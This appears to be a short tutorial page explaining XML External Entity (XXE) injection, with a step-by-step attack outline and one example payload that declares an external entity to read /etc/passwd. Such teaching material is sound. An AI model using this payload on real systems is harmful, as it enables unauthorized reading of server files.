Professional Documents
Culture Documents
What is XXE?
XML External Entity injection (XXE) is a web security vulnerability that exploits
an application's processing of external entities within XML data. Attackers can
inject malicious entities that reference external resources or perform
unauthorized actions, potentially leading to data breaches, information
disclosure, and server-side attacks.
XML Entity:
An XML entity is a predefined or user-defined symbolic representation of data
that can be referenced within an XML document. Entities are used to represent
special characters or reusable pieces of content, making it easier to manage
and reference them throughout the document.
An XML External Entity (XXE) attack exploits the capability of XML processors to
include external entities, leading to potential disclosure of sensitive
information or even remote code execution. Here's a step-by-step explanation
of how XXE attacks are performed:
1. Understanding the Target:
• Identify a target application that processes XML input, such as a web
application or a service.
2. Crafting Malicious XML Payload:
• Create a malicious XML payload that includes a declaration for an
external entity. The payload is designed to exploit the application's XML
processing functionality.
3. Injection of Malicious XML Payload:
• Inject the crafted XML payload into an input field or parameter of the
target application that processes XML. This could be part of a web form,
an XML-based API, or any other input mechanism.
4. Triggering XML Processing:
• Submit or send the manipulated input to the target application, forcing it
to process the XML payload.
5. Exploiting External Entity Declaration:
• The XML parser interprets the external entity declaration and attempts
to fetch the external resource specified in the payload. This resource can
be a file, URL, or any other data source.
Example XXE Payload: Consider the following XML payload that attempts to
read the contents of the /etc/passwd file:
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM
"file:///etc/passwd" >]> <foo>&xxe;</foo>
In this example, &xxe; is an external entity pointing to the /etc/passwd file.
Reference
• https://medium.com/@onehackman/exploiting-xml-external-entity-xxe-
injections-b0e3eac388f9
• https://infosecwriteups.com/exploiting-xml-external-entity-xxe-injection-
vulnerability-f8c4094fef83